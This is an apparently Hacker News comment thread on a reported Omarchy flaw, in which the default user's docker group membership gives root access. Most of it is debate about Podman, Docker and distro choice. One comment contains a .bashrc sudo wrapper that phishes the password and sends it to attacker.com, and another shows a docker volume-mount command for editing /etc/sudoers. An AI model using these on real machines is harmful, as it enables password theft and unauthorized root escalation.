11 ms·
Omarchy: Any User Process Can Escalate to Root
- darkwi11ow 1mo agoWhy not use rootless podman? It is 2026 not 2016, Podman works much better than Docker today.
- nkydr0i0 1mo agothat's what I do and what the author recommends as well
- phoronixrly 1mo agoSomehow I doubt DHH and company would be OK sacrificing ""developer experience"" for security... There is still a non-trivial amount of docker-compose files and Docker incantations that don't work 1:1 with podman and podman-compose. Adjusting them would require Omarchy's users underatanding podman, and I doubt this will align with the opinionated nature of Omarchy..
- ecshafer 1mo agoCome on. I am sure you don’t like DHH. But he’s always taken security seriously in Rails.
- phoronixrly 1mo agoAs I said, podman requires effort and thought on the user's side, as the rootless part incurs complexity. I do not think that this aligns with the omakase mantra of omarchy. I do not think that DHH does not take security seriously. I think that Omarchy is not meant to sacrifice devex for security.
- isityettime 1mo agoRootless Podman (and rootless Docker for that matter) is not difficult to set up automatically. There is a little complexity involved, namely in configuring subuid and subgid mappings, but not much. That said, I think Arch Linux itself has a culture that values the wrong kind of simplicity (implementation simplicity) that perversely leads to a failure to adequately grapple with inherent complexity. This leads to brittle implementations, "buyer beware" norms, "you should have run the notes", "this command should never be used", etc. Omarchy inherits all of that from Arch. It also, it seems, carried its own perverse notion of "simplicity".
- phoronixrly 1mo agoI was not referring to the setup complexity. Setup is performed just once. I was referring to the runtime complexity that comes naturally from having to take into account non-root user permissions and lack thereof. These peculiarities are quite a low bar, but they are still a non-trivial hurdle in the way of devex. I am a fedora/opensuse user and happily use podman with selinux.
- isityettime 1mo agoIME it's not too bad, but I see what you're saying. I guess we're mostly in agreement.
- 12985-1286 1mo agoShopify forced him to be a vibe coder now. Omarchy is a vibe coding distribution. In the AI world, security issues are just another marketing opportunity. EDIT: Downvote all you want. He was anti-AI, got a board seat at Shopify and then became an AI influencer. Now additional money is rolling in to Omarchy from Lütke and Steinberger.
- newspaper1 1mo agoIt's really disturbing that there's a group of these CEO/investor types that are openly white nationalists, and they're joining forces. I'll never touch any of their products, and I hope they continue to expose themselves on social media.
- deleted 1mo ago[deleted]
- deleted 1mo ago[deleted]
- psjs 1mo agoOmarchy is an agent first experience, no? just ask your agent!
- PuercoPop 1mo agoDon't use podman compose unless you want to have a bad experience. Play kube is podman's API for orchestration.
- alienbaby 1mo agoThe article specifically calls this out as a preferred option.
- iririririr 1mo agobecause the distro is all about convenience over security, while selling an aura of technical superiority. Which is the modus operandi that worked for the distro author in the past, when he sold VPS with a big markup, because he also gave a script that did "ssh vps -- curl somebashscript" to do basic webdev taks. > The security tradeoff was made for them, applied to the default account, and the tradeoff was not explained to the user. just like the vps era. it's all about convenience.
- IsTom 1mo agoI've used docker until recently just because it was what I was used to. It turned out I can basically just `apt install podman` and it'll just work. I might have stayed a bit behind the times with having podman slotted as a redhat thing.
- hemlock4593 1mo agoRootless docker is also an option. > Podman works much better than Docker today. Nah absolutely not. Especially compose files and networking can be an absolute nightmare with podman.
- drnick1 1mo agoCompose files work just fine. The gap with Docker has basically closed, and the few things you can't do or that behave differently are precisely the things Docker shouldn't be doing.
- 0xbadcafebee 1mo agoIs it opposite day already?
- phoronixrly 1mo ago[flagged]
- techscruggs 1mo agoThis is the type of security and vulnerability testing that actually matters. In a sea of security researcher noise, thank you for contributing in a meaningful way.
- Retr0id 1mo agoLol. This misconfiguration is so common and so trivial that LLMs have been known to exploit it unprompted, to complete their task.
- mococa 1mo agoIs it not better to run a VM just for Docker, like we have to do on macOS?
- gruez 1mo agoThat has all sorts of issues like eating disk space and RAM, because neither can't be released to the host once allocated, but then become unused.
- mococa 1mo agoAt least is secure(tm)
- K0IN 1mo agoI just want to put this out there, smolmachines is a wonderful program to solve this, I use this mostly for stuff needing docker socket / docker in docker (example strix and agents). (I'm using podman on my host)
- Anonyneko 1mo agoAt that point why not just simplify things and go back to Vagrant...?
- dimitarbogdanov 1mo agoDamn, I did not know you need a VM for Docker on macOS. That's kind of ironic, isn't it XD Every day I wake up and thank the universe for MS making WSL2
- skydhash 1mo agoIsn’t WSL2 vm based?
- maleldil 1mo agoWSL2 is also a virtual machine.
- anglesideangle 1mo ago
- antiloper 1mo agoInstalling docker by default is completely insane. What are they doing? Rootless podman has been around for many years at this point.
- lrvick 1mo agoRootless docker is even an officially supported install method.
- qweqwe14 1mo agoOK... and? This doesn't matter for a desktop, because: 1. Having access to the user's home directory is way more serious than being able to install drivers or whatever 2. There are a million other ways to escalate to root by obtaining the user's password I also don't understand the point of these distros, just install Arch with KDE via archinstall, it literally takes 15 minutes. Why is it that people feel the need to use someone's Arch setup?
- gruez 1mo agohttps://xkcd.com/1200/ https://xkcd.com/1200/
- lobofta 1mo agoBecause it looks cool and DHH makes a lot noises that sounds like you should listen to him.
- inigyou 1mo agoAnd he politically aligns with a lot of people.
- mandeepj 1mo agoLol! He's gordon ramsay of tech, who's frequently contradictory himself. On Round 2 with lex, he said something like no one lost recently due to using digital Maps. Well, check this one - https://youtu.be/z5ElIor-oXk?si=XfcS1UtC2OWReVXr https://youtu.be/z5ElIor-oXk?si=XfcS1UtC2OWReVXr He's bashing and insulting all engineers and then asking for their contributions and complaining that not many people are committing code in open source repos.
- jp_sc 1mo agoBecause they like their Arch setup? Because installing Omarchy is three to five minutes at most so three to five times faster? XD
- KetoManx64 1mo agoThe point is that there are millions of people out there that are curious about Linux but are put off by anything command line. Distro like this, especially Quatro which has a big focus on agents, makes it more inviting and gives people an instant path to get help/have their problems solved without them having to search archaic error messages
- exitb 1mo agoIt’s not great, but I’m not sure this should be framed as Omarchy-specific, when it’s a very common setup to add regular user to the docker group.
- gruez 1mo ago>when it’s a very common setup to add regular user to the docker group. As an official configuration? Or in random copy paste guides? The former is very different than the latter. It's not uncommon to disable sudo passwords, but it would be considered a serious security lapse if that were the default on some OS.
- bardsore 1mo agoAdding your user to the docker group is in the official Docker install instructions, I wouldn't call that "random copy paste guides".
- gruez 1mo agoYou mean the optional post install instructions, which is a separate page from the main install instructions, and contains a giant warning about the security implications? https://docs.docker.com/engine/install/linux-postinstall https://docs.docker.com/engine/install/linux-postinstall If the official sudo project had a guide on how to disable passwords, that shouldn't be taken as endorsement of having that as a default config.
- lrvick 1mo agoPer my other comments, it does not really matter if you disable the sudo password or not. If you have a sudo binary at all you effectively are giving every user process root since malware can mask the sudo command and intercept the password so trivially.
- dpkirchner 1mo agoThe methods are described on the official docker website, not just random blogs or SO pages. There are caveats about security, of course, but it's not truly discouraged.
- pibaker 1mo agoI was expecting a more sophisticated attack and then I scrolled down… > Omarchy configured its default user as a member of the Linux docker group. What the fuck? Docker makes it VERY, VERY clear this is unsafe. Feel free to verify the documentation. https://docs.docker.com/engine/install/linux-postinstall/ https://docs.docker.com/engine/install/linux-postinstall/ Why would you want to make this the default for your users, without even telling them? Did someone configured his own system to work this way and decided it is a good idea to ship it as a part of an "opinionated" distro??? Makes you wonder how much other crap is there.
- qweqwe14 1mo agoBecause it's convenient, and the security of this doesn't matter for desktop usage.
- deleted 1mo ago[deleted]
- iririririr 1mo agolol. people will vote you and not realize the irony. just look at all the comments "this is a fair and common mistake" that are not being ironic.
- k_roy 1mo agoDefault configuration or not, I also imagine the first thing people using docker do is to add themselves to the docker group via sudo. If you are security-conscious, you shouldn’t be using docker anyway.
- pibaker 1mo agoIf you are adding yourself to the docker group, you have presumably read the documentation and its warnings. Does an Omarchy user know the distro has made the decision on their behave? TFA spells out why this is wrong better than I could. > There is another important aspect of this configuration. It was opt-out, not opt-in. A user did not have to actually use Docker. The security tradeoff was made for them, applied to the default account, and the tradeoff was not explained to the user. > Security-sensitive defaults matter precisely because many users reasonably assume that the operating system defaults to secure and will inform or prompt them to opt-in to less secure settings.
- thehamkercat 1mo agoI think people shouldn't just jump to distros which are getting heavily hyped in media/Youtube, cachyOS had similar wave, and now Omarchy does. (example: NetworkChuck, Primeagen? and a few others) also, archlinux is much easier to install nowadays with archinstall [1], so i'm not sure you really need another opinionated layer on top of it [1] - https://wiki.archlinux.org/title/Archinstall https://wiki.archlinux.org/title/Archinstall
- bundie 1mo agoJust use Fedora. It just werks (most times).
- kennywinker 1mo agoI like the very non-windows very non-mac ui of omarchy.
- tomrod 1mo agoUI is desktop environment and (usually) ports to large-use distros cleanly. - JaKooLit’s Fedora-Hyprland Repository: https://github.com/JaKooLit/Fedora-Hyprland https://github.com/JaKooLit/Fedora-Hyprland. The most popular automated setup guide and installer for Fedora, bundling Hyprland alongside pre-configured bars, launchers, and - Official Hyprland Wiki: wiki.hypr.land/Getting-Started/Installation/. The main reference guide for core configuration options, environment variables, and Wayland portal requirements. - Solopasha Fedora COPR copr.fedorainfracloud.org/coprs/solopasha/hyprland. The primary community repository hosting cutting-edge builds of Hyprland and its ecosystem packages for - Fedora Discussion Tutorials: discussion.fedoraproject.org. Community walkthroughs covering minimal netinstall setups and distro-specific Wayland troubleshooting.
- christophilus 1mo agoI run Niri and Dank Material Sell on Fedora. It’s perfect, and better than Omarchy from what I’ve seen. I much prefer scrolling window managers to tilers.
- mike_hearn 1mo agoLinux isn't like macOS, it doesn't have any kind of proper desktop sandboxing architecture that really works. So this is kind of security theatre. If you run a malicious program it can do stuff like tamper with your PATH or exploit local vulns in apps to get to the point where it can control anything that matters (which root generally doesn't). For instance it can just drop a custom shell into ~/.bin/.hidden-shell and reconfigure the terminal emulator to run it. So this kind of "vulnerability" doesn't seem that important. If you run code as yourself on Linux it owns you. On macOS it's very different. Pervasive code signing gives all apps a stable identity enforced by the kernel that they can't easily escape. The kernel can then impose sandboxing policies on any app that's run regardless of how it's installed, for instance, preventing apps from rummaging through ~/Documents or monitoring your screen. Permissions are editable and guaranteed to stick, including across upgrades. And root is disempowered so obtaining it barely matters, it's only really there for UNIX compatibility. Unfortunately implementing an Apple style architecture on Linux would be very difficult.
- bigyabai 1mo ago> it doesn't have any kind of proper desktop sandboxing architecture that really works. Bubblewrap works.
- graemep 1mo agoand Firejail
- oever 1mo agoand sydbox
- mike_hearn 1mo agoBubblewrap is a less powerful version of sandbox-exec, but the macOS architecture is much larger than just that. In effect macOS runs everything under bubblewrap, in such a way that users don't notice but apps are meaningfully sandboxed and root exploits barely matter.
- PaulHoule 1mo agoI hate to be defending Omarchy but I think for the modern desktop OS like Linux or Windows or Mac OS, "root" is not what it used to be. Like if I have something on my dev machines which is important from an enterprise perspective it is the credentials that I use to check things into the git repository or log into the postgresql database that are in some file or keyring or the credentials I used to log into some corporate IT system with my web browser. Or the Microsoft Word document with confidential plans, or the spreadsheet with personal data on 30,000 people that I don't really need to have, etc. The "root" barrier is of limited effectiveness against those sort of attacks but the barrier between users is less important on a personal computer as opposed to the "minicomputer" world that gave birth to Unix. In 1989 my school had a cluster of Sun Workstations running Unix for which student, faculty, and staff had accounts and it was a real threat model that you might steal the homework assignment of another student or you might take screenshots of the screen of the computer center's director that would let you watch him reading his email his email and such. I more concerned that Apache is running under a "httpd" account or IIS is running under its own account so that I do have controls on what can be exfiltrated by that route but... The modern developer is likely booting up a sinatra or JAXB or a httpx server on some high numbered port running as their own user so if they're going to get hit with data exfiltration or remote execution against a dev server the scope is most user files.
- JuniperMesos 1mo agoI would say that the traditional notion of Unix root and normal user accounts is outdated, no longer useful for how people use computers today. On my personal laptop, malicious code having access to my user files is as bad as having root access - I'm the only user of my machine - and I don't have any convenient way to create more granular security zones among software running as my own Unix user.
- isatty 1mo agoWhat on earth is an Omarchy
- 12985-1286 1mo agoOfficially omakase (clueless chef decides your menu with security issues) and arch linux. The fact that it is almost an anagram of monarchy is probably a plus for DHH.
- enbugger 1mo agoYou realize you are exemplary hater when you feel an urge to post comments like this
- khash12 1mo agoYou are absolutely right and I'll have Claude read a ChatGPT summary of Paul Graham's hater essay!
- preommr 1mo ago> The fact that it is almost an anagram of monarchy is probably a plus for DHH. I spend way too much time online; but it's good to know I am not this terminally online.
- isatty 1mo agoThank you! Sounds horrible. I don’t know what a DHH is though, probably not important.
- jm4 1mo agoThe guy who invented Ruby on Rails. He’s been pretty important in web dev and he’s an excellent engineer, although he’s a polarizing figure. He’s always been opinionated and never afraid to ruffle some feathers. More recently, he’s been posting some controversial right-wing stuff online that pissed off a lot of people.
- deleted 1mo ago[deleted]
- concinds 1mo agoA few days ago someone found they were flowing USB descriptors straight into the shell. https://github.com/omacom/omarchy/commit/9285b19d6a72eba3df8537d62a4cd5506a803d89 https://github.com/omacom/omarchy/commit/9285b19d6a72eba3df8... Don't use vibecoded distros. It doesn't matter whether they fix this or that, or whether you care about a particular vuln. This is not sensible. It's why you switched away from Windows in the first place, remember?
- jp_sc 1mo agoIt's definitely not why *I* switched away from Windows
- Brian_K_White 1mo agoYou didn't switch away from windows to get superior software? Also, the statement was valid because it will be true for most. It doesn't matter that you read it and it wasn't true for you, as long as it's true by the numbers, it's true, because it's one-to-many communication not one to one.
- AshamedCaptain 1mo agoWhile I don't want to discuss the quality of any distro vs Windows, there is a big reason most of us use free software: because it is free. Whether for you it is because of free as in freedom or free as in beer specifically, quality may not have much to do with it.
- normie3000 1mo agoIsn't Windows also basically free? Every laptop I buy has a Windows licence stuck to the bottom of it.
- AshamedCaptain 1mo agoNo and you missed the "freedom" part of the adage.
- wildster 1mo agoDebian 13 is good.
- ruby_curmudgeon 1mo agoSomebody should do an audit of Omarchy Plugins: https://plugins.omarchy.org/ https://plugins.omarchy.org/ They run completely unsandboxed and are unvetted.
- archole 1mo agoAs expected from a vibecoded "distro"
- arjie 1mo agoSurprised by this. I only ever use podman (which by default, runs rootless) these days and haven’t felt the need for docker. Feels like reading about a CVE in Compiz.
- lrvick 1mo agoTo be fair it is easy for malware to escalate to root on any major linux distro because sudo is completely security theater. Malware just need to put this in ~/.bashrc and wait: function sudo () { realsudo=$(which sudo) read -r -s -p "[sudo] password for $USER: " password echo "$USER: $password" | \ curl -F 'p=<-' https://attacker.com >/dev/null 2>&1 $realsudo -S <<< "$password" -u root bash -C "exit" >/dev/null 2>&1 $realsudo "${@:1}" }
- tomrod 1mo agoWhat? Why is sudo security theater?
- lrvick 1mo agoBecause it is trivial for unprivileged malware to phish the password and escalate to root. No production system should ever ship with sudo.
- jorvi 1mo agoYou do realize you can do the exact same thing on macOS? Just alias sudo to whatever you want. BSD I assume you can do the same with doas. No desktop system is safe from your attack, unless you take specific precautions like chattr on the file or chmodding your home directory, but that can lead to weird breakage.
- hollow-moe 1mo ago10M for a some shell scripts what a steal lmao
- porridgeraisin 1mo agoI mean, I saw this on twitter, and thought ok maybe its a nice exploit. But really? its the usual docker root thing? I wouldn't even consider that a vulnerability tbh, every personal laptop I had I add myself to docker group. Yes, you can not namespace pids, filesystem, etc, and get root, but it's never mattered. If someone can run that docker command, they can already read your whole homedir, edit bashrc, etc etc,. and sudo is useless anyways. Only on a system where you are a user without sudo access, does it even begin to make sense. And if you go to the trouble of intentionally setting up a user without sudo access, you wouldn't be adding that user to the docker group either. In the default install, I assume omarchy adds you to the sudoers as well, making this a perfectly ok thing to do Even if you participate in the esteemed Red Hat Security Theater and use wayland, flatpaks, etc, most flatpaks can write anywhere in your home dir, so they can do this too. On standard linux desktop, sudo is not really security, but it is a UX improvement as it adds friction to accidentally doing things to the "system". [I don't use omarchy]
- dalmo3 1mo agoI had no idea what Omarchy was, so I looked it up: https://omarchy.org/ https://omarchy.org/ Is there a name for a phobia of yt thumbnails?
- jaccola 1mo agoYes.. taste
- deleted 1mo ago[deleted]
- trentor 1mo agoI genuinely put companies that invested in this on my blacklist. I don't care about the politics behind it. His whole persona is and was to be edgy and cruel so nothing will change here. But there are probably millions of oss projects that deserve the funding more.
- rfgplk 1mo agoI've already stated this on the last Omarchy thread, the way DHH is implementing it is highly irresponsible and insecure. Half of his "distro" are essentially shell scripts where it's extremely easy to create accidental security holes. Considering that probably half of his code would need something like setuid/execute bits set in order to avoid configuration spaghetti, I'd imagine that there are _hundreds_ of vulnerabilities in there. If you think about it logically, just the desktop environment (note that I have no idea if he coded his own or is using an existing one) needs access to input the graphics driver the netstack all of which require priviledges of some kind.
- arandomhuman 1mo agoHe did not code his own desktop environment, it’s just hyprland.
- lelota 1mo agoOther day i was hearing DHH talk on Lex's podcast on Omarchy and how he does not look at the code anymore. The guy built solid reputation with his prev contributions but now falling to AI slop.
- comandillos 1mo agoThe docker escalation 'trick' is even a meme at this point
- SwellJoe 1mo ago"Opinionated" software sounds great until you find out the author has the stupidest opinions you've ever heard in your life.
- argsnd 1mo agoand in this case that's even before you get to the software opinions
- inigyou 1mo agoWhy is it always the people with the worst opinions who make the most stuff though? Why aren't the rest of us making popular stuff?
- al_borland 1mo agoTo put out something that is opinionated, one needs to risk others being critical of their opinions. People who are always worried about having the “right” opinions will rarely risk stepping out and doing something different. So all the safe boring stuff that gets released is just a defense mechanism, where people avoid going too far in and direction to avoid being accused of having bad taste. Ironically, this creates its own lack of taste. This lack of taste is usually just ignored as boring, rather than attacked, so it feels safer. At least that’s my read on it.
- SwellJoe 1mo agoAFAIK, Fabrice Bellard has normal opinions.
- TiredOfLife 1mo agoIs there a place he shares them?
- SwellJoe 1mo agoRefreshingly, no.
- addajones 1mo agoSad that people just complain about what DHH is doing and how he doesn't know anything. Nobody is forcing anybody to use Omarchy at all. Also $10 million was raised by him for it, did anybody else here raise that for a distro? I'm tired of the constant complaining and criticizing. Nobody said you have to use it.
- eviks 1mo agoNobody said you can't complaint about things unless you're forced to use them!
- addajones 1mo agoWell thats what I've noticed lately here on HN, complaining is #1, everything else follows. lol.
- Arrowmaster 1mo agoI don't care what he's doing, I care about what he is.
- addajones 1mo agoHe's a person, just like you are. Let him know then, he has an email and you can message him publicly on X.
- jarek-foksa 1mo agoHe clearly "suffers" from narcissistic personality disorder, trying to change him is a waste of time. Even if he was a normal person, I see no rational reason for him to change his behavior given how successful he is.
- addajones 1mo agoSo he’s a lost cause to you? You decided already? So much doom and gloom in your response.
- addajones 1mo agoThere were many amazing distros before Omarchy and there will be many after. Use whatever you want, vibecoded or not. Don't tell people what to do. Make your own decisions.
- trentnix 1mo agoThe Docker configuration issue was reported and changes were made quickly to address it. Sounds like this is a great example of the system working well. Omarchy looks like a simple way for a developer like me to test drive hyprland and write code. It also looks like a great way for my kids to get into computers as there's an agent harness ready to help them manage their machine and use free software, even the stuff that's a bit obtuse. I'm bewildered that people are mad about any of this, but then I remember I don't care what the gatekeepers think anymore.
- zenburnmyface 1mo agoGatekeepers? Someone is pouring something into your ear.
- bigyabai 1mo agoIt's easy to disable rootful Docker support in an ISO, but much harder to fix the vulnerable installations. That is not the system working as intended. And sadly, this stuff isn't bewildering at all. We saw it happen with LARBS, we saw it happen with Manjaro, then Archlabs, and now Omarchy too. All of them endangered themselves by shipping dotfiles that none of their users understood, and few of their developers would justify. When Manjaro's repos conflicted with AUR pkgbuilds, thousands of their users didn't understand that Manjaro had a special repo override for system packages that lags 2 weeks behind upstream. Omarchy tempts the same fate by stacking custom packaging channels and pacman scripts on-top of a system that gets advertised as "regular" Arch Linux. Distro variety is always a good thing, but there has always been different levels of commitment to it. If I was putting together a Linux system for a kid or someone elderly, I'd just give them Fedora/GNOME instead of trying to get them into larping r/unixporn.
- optimisticedits 1mo agoPersonally, I wouldn't recommend any Linux distro other than Manjaro with XFCE, for a non-expert, because it just works and installing software is a breeze with Manjaro's graphical UI (pamac). I've been running various Linux desktops since the late 90s and every single distro without exception has eaten itself from updates...except for Manjaro which I've been running exclusively now since 2018 without so much as a hiccup. Two-week old packages is nothing. The most popular Linux distributions aren't even rolling distributions and they'll have you using packages that are years old.
- vinniepukh 1mo agoanecdotal and fwiw, Omarchy is the first distro that "stuck". I've been using it on my desktop for a year now. I use it for personal projects and light gaming via Steam. Personal MacBook is only used when I want to compute on the couch. Work computer is also a MacBook. But everything else, Omarchy desktop. Previous attempts with Ubuntu and PopOS! never stuck.
- jksmith 1mo agoBarely related, I decided to move on. Linux has been weaponized for self-promotion. So I'm happy just working with Beastie these days.
- zsoltkacsandi 1mo agoThat is what happens when someone without a clue what is he (khm, DHH) doing vibe codes a distro.
- pkulak 1mo agoWow... this is really telling. This isn't some obscure whoopsie. The docker install page has a giant section explaining exactly this problem. Every Docker section on every distro wiki walks through this issue in detail. It 80% the reason Podman was created in the first place.
- bakugo 1mo agoUbuntu has the exact same vulnerability, except with lxd instead of docker, but for some reason, it's considered working as intended. On a fresh install of Ubuntu Server, the first user created is part of the lxd group, can install lxd without root thanks to snap, and can immediately create a privileged container with the host's root filesystem mounted inside.
- tasuki 1mo agoYes ok, but the moment you gain user access to my machine, I've already lost. The amount of damage you can do as root is about the same you can do as me.
- remusrm 1mo ago[dead]
- numpad0 1mo agoot fyi: "omarchy" is fine as a creative spelling for omachi, but "omacon" / "omacom" has extremely low Levenshtein distance with the honorific form of the word for human female reproductive component in japanese
- JuniperMesos 1mo agoAnd the word "pine" is kinda close to "penis", what of it? Words in languages sometimes sound kinda like rude or sexual vocabulary, especially in a language like Japanese with a relatively small phoneme inventory.
- numpad0 1mo agoThose two aren't as close
- mistercheph 1mo agoNo way, the vibecoded distro has security problems!?!?! WTF, didn't DHH ask claude to check for security issues?
- yoyohello13 1mo agoAnd the cycle continues. It’s funny seeing Omarchy (DHH) becoming popular when we had LARBS (Luke Smith) 8-10 years ago. Something about a controversial personality pushing a window manager install script is really appealing to people I guess. At least it brings awareness that other desktop paradigms exist. Although after years of ‘optimizing’ my tiling window manager I just ended up back on KDE.
- kodoman 1mo agoNot an Omarchy user and use podman rather then docker. But is this not a docker issue rather then a Omarchy issue, docker should verify user permissions through the socket, it's quite bad that it does not no?
- SahAssar 1mo agoSorta, but there is a reason that no other distro does this by default and that docker itself warns that doing this is effectively giving the user password-less sudo. So this is a problem in Omarchy specifically since it does the dangerous thing silently and by default while everyone else tries to inform the user of the consequences.
- kodoman 1mo agoI see, if it's common knowledge of people who use docker that rootful docker is root (though this does seem bad and they should just check the user perms at least) this sounds pretty terrible on Omarchy's part.
- eahm 1mo agoAnd here it begins… Been using Linux on and off for 30+ years and I’ve always always had second thoughts about using anything outside the main 3-4 distros, and I mean forks, blends etc. let alone vibe coded distros, even *buntu feels like a stretch. I really like DHH’s enthusiasm and what he’s trying to do but I will never touch that “distro”. Debian/Devuan, Fedora/RHEL/Alma/Rocky, Arch/Artix, FreeBSD/OpenBS/NetBSD are all anyone will ever need. You feel more adventurous? NixOS, Gentoo, Slackware, Void. That’s it. No forks, no blends. I keep Xebian and LMDE ISOs in my flash drive to show people but I don’t personally use even those. People jumping all around these new distros that only seem to change a wallpaper without knowing the basics is a bad choice, like the first comment says, isn’t this the reason you wanted to move away from Windows in the first place? Just take your time and enjoy learning, they are all so simple today compared to decades ago it’s crazy. Thank you for listening to my TED talk.
- kodoman 1mo agoThe scenario of running any agent on the host raw seems far fetched for most users. I think everyone is running these things in at least a container, I know I never trusted running claude code or any agent for that matter, but I might be a little paranoid on that front.
- killix 1mo ago[flagged]
- randerson 1mo agoThe likelihood of Omarchy being hacked is no doubt compounded by the number of enemies DHH has created who would love to see him fail.
- felixfurtak 1mo agoThere are definitely a few security holes in Omarchy. I tried installing their win11 docker script and that just saves the username and password of the Windows VM as plain text in a config file. I like playing around with Omarchy since there are a lot of interesting ideas put together in a semi cohesive 'OS', but would probably not use it for anything serious until it became a bit more mature.
- dist-epoch 1mo agoyou probably mean win11 vm script, that's not really a security hole, as the host running the vm you are basically root on windows anyway, unless you bothered to encrypt the drive inside the windows vm
- ThePowerOfFuet 1mo ago>the most important takeaway is simple: update to 4.0.1. I gotta say, that is not the most important takeaway for me; rather, "don't walk, run".
- ahmetozer 1mo agoCouple of months after this discovery, Internet explorer 11 will be released (October 17, 2013)
- Mon0t0n 1mo agowhy would anyone use this distro when there are so many options? genuine question.
- slig 1mo agoDHH is an influencer and people like to follow them. I know I did 20 years ago when his videos influenced me into saving for a MacBook. He basically meme'd web dev with rails on TextMate.
- TiredOfLife 1mo agoThat's the point of omarchy. There are no options. You boot from iso, enter your name and press enter. After a minute you have a working system. Basically every other distro is: choose one of these 10 filesystems, 5 bootloaders and 20 desktop environments
- Mon0t0n 1mo agoThis is not true. Plenty of distros are dead simple to get started with. Including the most popular ones like Ubuntu.
- andrewvc 1mo agoOnce you have a box vibe coding has happened on I wouldn’t trust anything on it. Thats why I vibe code on a fully separate machine. Im not an Omarchy user but we now live in a world where most of the actions (including ones the llm asks users to run as root) originate from somewhere other than the users brain. There will be a reckoning in terms of how we think about trust and auth in coming years. It’s just a matter of increasing severity of incidents .
- WhyNotHugo 1mo agoI can't fathom why it's so common to run docker as root instead of as an unprivileged user. Docker has supported running rootless mode for years. I packaged the docker-rootless into Arch/AUR over 4 years ago, so it's been around and stable that long. Sure, on a server dedicated to running docker containers, maybe it makes sense for the marginal improvements to network latency. But otherwise, rootless should always be the default.
- NewJazz 1mo agoInertia. All the guides tell you to set it up the "easy" way.
- hashstring 1mo agoNo one serious about security touches Omarchy. Practically every distro suffers from critical LPEs, but at least there’s a bar. Omarchy is a hot mess that exists for the same reason that matcha is in our coffeeshops and peptides are in our collective memory.
- ryan_n 1mo agoGenuinely so confused about your last sentence, please explain…
- JuniperMesos 1mo agoThis is a weird metaphor - why do you think people buy matcha at coffeeshops or use peptides? Those two things don't have anything obvious to do with each other, let alone with Omarchy.
- senectus1 1mo agoexcept that all three things are getting a lot of social media clout. they just keep pumping out short form videos or yapping heads talking about how they use x to do y better than any of the old stuff... I think this is the OP's point. they all exist because there is a lot of noise about them existing and being used.
- hashstring 1mo agoThank you, that’s it exactly.
- shevy-java 1mo agoThat's some fame now.
- mentalgear 1mo agoFriends dont let friends use Omarchy or [claw] products.
- moojacob 1mo agoOmarchy has me questioning liking Rails because it just… straight up sucks? It comes preloaded with friggen ZOOM. I don’t think Windows bloat is that bad. If it makes people happy it makes people happy I guess. These guys trying it would be even more amazed at Fedora Workstation (“you can press windows and it shows all your open windows? That’s so much better”)
- cute_boi 1mo agoi don't understand why DHH is shipping so much bloat in omarchy. The better solution would be to ask if user wants to install bloatware during installation.
- alberth 1mo agoDHH created a distro for what he personally needs for work, and his company uses Zoom. It's that simple.
- NewJazz 1mo agoThere are far better ways to handle setting up a workstation for one's needs than spinning a new distro.
- westpfelia 1mo agoPerfect example of a usecase for nixOS. Single file and its got everything DHH wants.
- zer0zzz 1mo agoThats pretty good, then he should have made a toolkit for building and rolling your own badass distro and not a "opinionated" "omakase" system that claims to solve all of deskop linux while personally mocking a lot of people that actually have made real contributions as "clowns".
- moojacob 1mo ago
- dmix 1mo agoDocker should never be used as a sandbox for anything.
- plqbfbv 1mo agodocker access == root, as long as you can use volume mounts to arbitrarily mount anything else on the machine to a container. If the user is in the `docker` group, he's effectively root because he can patch around system files. I once used this to recover lost sudoer access to a machine (have tested this now by editing my sudoer file with a comment): ~ docker run -it --rm -v /etc/sudoers:/etc/sudoers ubuntu bash # apt update && apt install -y vim # -- edit /etc/sudoers # wq! ~ exit ~ sudo cat /etc/sudoers - works, comment is present
- teravor 1mo agothere is currently no linux distribution where it's safe to run an application as is. they tend to have access to /home which is game over. some people who actually care about security will create bubblewrap/bwrap profiles for applications and then run those profiles. an application isolated in this way will have a limited view of the system much less the ability to modify it. it usually takes the form of a custom /home for every app. this still leaves the kernel exposed for an application to poke at and maybe escape with a 0day. some people run a VMM to further isolate the application, these days you can passthrough Wayland. if the application isn't graphical you should probably use gVisor instead.
- shdh 1mo agoOut of all the commentators here actually running Linux Desktop, I wonder how many have used Omarchy? To me its the best Linux desktop experience I've had without having to overly waste my time configuring things.
- nilkn 1mo agoMy most controversial opinion by far in tech circles is that I still just use a standard Windows gaming PC as my home desktop. My current machine I just bought pre-built from Microcenter, complete with a 5090 and everything. I can fire up a Linux terminal with WezTerm and WSL2 at any point. It's customized and beautiful and totally fine. I have Codex running in one right now. I can listen to Dolby Atmos music through Apple Music or fire up a game with zero compatibility issues and full RTX support. It's just versatile like nothing else. I pair it with a gigantic 48" LG OLED TV as my monitor. The only thing that might tempt me away from this is a fully loaded Mac Studio with 512GB of unified memory. That would be a real capability gap from my current machine. But I've contemplated wiping Windows and installing Omarchy, and I just can't figure out really what I'd gain, but what I'd lose is quite clear.
- asqueella 1mo agoHas it restarted losing your session to install an "Intel Corporation - Extension - 22.1120.5.12" yet?
- deleted 1mo ago[deleted]
- briHass 1mo agoWindows has also come a long way from a terminal perspective. Sure, the UI is a bit of a mess, but Powershell can do anything in the UI from the command line, and agents are very capable with PoSH. If you really care about ricing the UI, there's hundreds of utility apps to do almost anything you want. Agents are also able to tweak and debug Windows errors, since the registry, group policy, event log, and other Windows internals have been largely unchanged for 25+ years and are well documented. All have old command line tools or modern Powershell to manage.
- TiredOfLife 1mo agoyou have to understand that 90% of HN use macs and the only time they see windows is once every 5 years when a relative asks to setup a new or clean an infected one
- tescreal 1mo agoIt's disappointing to see the way the developers are pushing this pre-alpha quality work. I don't know (nor care) about the personalities attached, but the pitch is neat. The way it is being handled with almost daily reports of RCE/Escalation is jaw dropping though. They need to spend some of those bux on auditing and less on whatever vibe-based engineering they're doing. For haters: ignore them and recommend your favourite. For lovers: lobby the developers to raise their standards.
- Cameri 1mo agoWas this vulnerability disclosed responsibly by the author?
- Icarusfoundyou 1mo agoYes, it has: > I reported this issue privately through the project’s responsible-disclosure process. The underlying configuration has since been patched, so I’m publishing the details now to explain what the issue is and let users know to update their systems.
- coursenumpls 1mo ago[dead]
- ghthor 1mo agoIf you editing your system config with an LLM and tool calls, why wouldn’t you just use NixOS. At least if the agent broke your system, you can basically recreate it from scratch in under 30mins (some things still might be outside the system/home-manager config). But yeah, then you get diffs of what the agent changed in a nixos/home-manager change. I see almost zero reason for anyone to use anything else for they’re base system at this point.
- databusinessai 1mo ago[dead]
- SamInTheShell 1mo agoPoor software choice for usecase. `sudo pacman -S podman` didn't come with these problems out of the box and assumed rootless by default.
